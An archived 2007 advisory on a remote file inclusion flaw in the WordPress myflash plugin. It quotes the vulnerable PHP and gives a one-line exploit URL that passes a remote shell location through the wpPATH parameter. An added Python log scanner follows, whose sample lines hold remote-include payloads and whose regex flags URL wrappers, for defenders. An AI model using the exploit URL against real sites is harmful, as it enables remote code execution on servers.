Wordpress plugin myflash <= V1.00 (wppath) RFI Vulnerability

2007-05-02T00:00:00
ID SECURITYVULNS:DOC:16913
Type securityvulns
Reporter Securityvulns
Modified 2007-05-02T00:00:00

Description

--------------------------------- [ Such a Treacherous World! ] --------------------------------------

Title : Wordpress plugin myflash <= V1.00 (wppath) RFI Vulnerability


Author: Crackers_Child

Contact: cybermilitan@hotmail.com



Application : Wordpress plugin

Web Site : http://alexrabe.boelinger.com/


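Vulnerable code in myflash-button.php:

// wpPATH comes straight from the request (GET or POST) with no validation
if (!$_POST) $wppath=$_GET['wpPATH']; else $wppath=$_POST['wpPATH'];

// the request-controlled value is used as the prefix of both include paths
require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');

global $wpdb;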

Exploit:

http://[target]/[path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?


greets:

Everybody


--------------------------------- [http://www.biyosecurity.net ] --------------------------------------

milw0rm.com [2007-05-01]
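
For defenders reviewing web server logs for the wpPATH inclusion described above, the following is an added example, not part of the original advisory or the plugin's code. It assumes common/combined log format; the sample lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# URL scheme or stream wrapper at the start of the value (http://, ftp://, php://, data:)
WRAPPER_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:)', re.IGNORECASE)
TARGET_SCRIPT = "/myflash-button.php"   # script named in the advisory
PARAM = "wpPATH"                        # PHP request keys are case-sensitive

# Constructed sample lines (documentation addresses and hosts, not real traffic).
PLUGIN = "/wp-content/plugins/myflash/myflash-button.php"
SAMPLE_LOG = [
    f'192.0.2.10 - - [02/May/2007:10:00:01 +0000] "GET {PLUGIN}'
    '?wpPATH=http%3A%2F%2Fremote.example%2Fx.txt%3F HTTP/1.1" 200 512',
    f'192.0.2.11 - - [02/May/2007:10:00:05 +0000] "GET {PLUGIN}?wpPATH=../../.. HTTP/1.1" 200 2048',
    f'192.0.2.12 - - [02/May/2007:10:00:09 +0000] "POST {PLUGIN} HTTP/1.1" 200 512',
    '192.0.2.13 - - [02/May/2007:10:00:12 +0000] "GET /index.php?wpPATH=http://remote.example/ HTTP/1.1" 200 100',
    f'192.0.2.14 - - [02/May/2007:10:00:20 +0000] "GET /blog{PLUGIN}?wpPATH=ftp://remote.example/a HTTP/1.0" 200 77',
]

def classify(line):
    """Return (verdict, value) for a request to the plugin script, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not unquote(url.path).lower().endswith(TARGET_SCRIPT):
        return None
    # parse_qs percent-decodes once, which mirrors what PHP puts in $_GET
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM)
    if values is None:
        # wpPATH may have been sent in a POST body, which access logs do not record
        return ("no-query-param", None)
    value = values[0]
    if WRAPPER_RE.match(value):
        return ("remote-include", value)
    return ("local-path", value)

def scan(lines):
    """Return (line_number, verdict, value) for every request to the plugin script."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = classify(line)
        if result:
            hits.append((n, *result))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because the vulnerable code also reads wpPATH from POST, a "no-query-param" hit on a POST request still warrants review of request-body logging or WAF records where available.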